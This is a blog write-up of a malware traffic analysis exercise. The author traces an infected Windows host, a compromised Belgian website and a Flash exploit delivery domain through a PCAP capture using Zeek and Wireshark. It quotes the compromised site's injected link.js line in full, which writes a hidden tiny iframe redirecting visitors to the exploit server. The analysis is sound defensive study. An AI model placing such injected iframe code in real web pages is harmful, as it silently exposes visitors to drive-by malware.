As my winter vacations come to an end, I decided to start warming up my brain in preparation for the final semester of my graduate program. Malware-Traffic-Analysis.net is a very good resource for practicing PCAP analysis. In this article, I describe my answers to the analysis questions of the PCAP file available here.
Note: In this article, I’m using Splunk / Wireshark for the complete PCAP analysis.
root@malnet:~/malware_traffic_exercises/2014-12-15# zeek -Cr 2014-12-15-traffic-analysis-exercise.pcap root@malnet:~/malware_traffic_exercises/2014-12-15# ls 2014-12-15-traffic-analysis-exercise.pcap conn.log dhcp.log dns.log files.log http.log packet_filter.log ssl.log weird.log x509.log
Hostnames of Windows VMs
The hostnames of the three Windows hosts are:
IP Address of Infected Windows Host and Compromised Website
In the snap below, we can see that there is traffic to on unusual port,
22780. From past experience, I know that malware often communicates on unusual ports.
The machine with IP address,
192[.]168[.]204[.]137 communicated with a remote host,
epzqy[.]iphaeba[.]eu with IP address,
168[.]235[.]69[.]248 and successfully downloads three files.
After extracting the files using Wireshark, I hashed them and checked on VirusTotal.
root@malnet:~/malware_traffic_exercises/2014-12-15/Files# sha256sum * db44b3235157740309e417751f5f244c3077fe35196456e1c19862bf18eee64f 48950 d748b12fd4058ca4bc3c2667ac5d445fa65e132a3bf0da0c067e20716240eb88 claimpl 9872a87cc4ce1b9430ad1567dd009191c441f9c7973ad6fb3a5f455ed6235866 land
48950 file was detected as malicious on VirusTotal and seems to be exploiting Adobe Flash.
root@malnet:~/malware_traffic_exercises/2014-12-15/Files# file 48950 48950: Macromedia Flash data (compressed), version 19
With the above information, it can be said that
epzqy[.]iphaeba[.]eu with IP address,
168[.]235[.]69[.]248 is delivering malware. The domain,
http://www[.]theopen[.]be/ with IP address,
213[.]186[.]33[.]19 is compromised because it is capable of redirecting users to the above malicious domain. The Windows host with IP address,
192[.]168[.]204[.]137 and MAC address,
00:0c:29:9d:b8:6d is infected. No other host downloaded the malware as seen before in the downloaded files snap.
Redirect Link Between Malware Delivery and Compromised Website
In Wireshark, I exported packets relevant to the infected Windows host,
192[.]168[.]204[.]137 into a separate PCAP file.
Using the filter,
http.request I displayed all requests made by the infected host to remote domains. First contact with the malware delivery website was made at packet number
344 with the referrer as
http://theopen[.]be which is the compromised website. Previously, there was another redirect to the domain,
col[.]reganhosting[.]com from the compromised website.
Using Wireshark I extracted
index.html page of the compromised website and
link.js file that was downloaded from
link.js, there exists a redirect to the malware delivery website as can be seen below:
root@malnet:~/malware_traffic_exercises/2014-12-15/Files# cat link.js document.write(("<iframe src='http://epzqy.iphaeba.eu:22780/flow/17610/avenue/67785/source/43028/total/7782/misery/swirl/some/29364/patience/interval/ford/settle/knot/55468/anyone/land/' name='yBnYN' width=13 height=10 frameborder=0 marginheight=0 marginwidth=0 scrolling=no> "));
index.html of the compromised website, there is a redirect to the malicious website,
Thanks for reading!
In this article, I described my analysis for the provided PCAP file. The most important aspect of this analysis was to find the redirect link that occurs from the compromised website to the malware delivery domain.
Thank you for reading! If you have any questions, leave them in the comments section below and I’ll get back to you as soon as I can!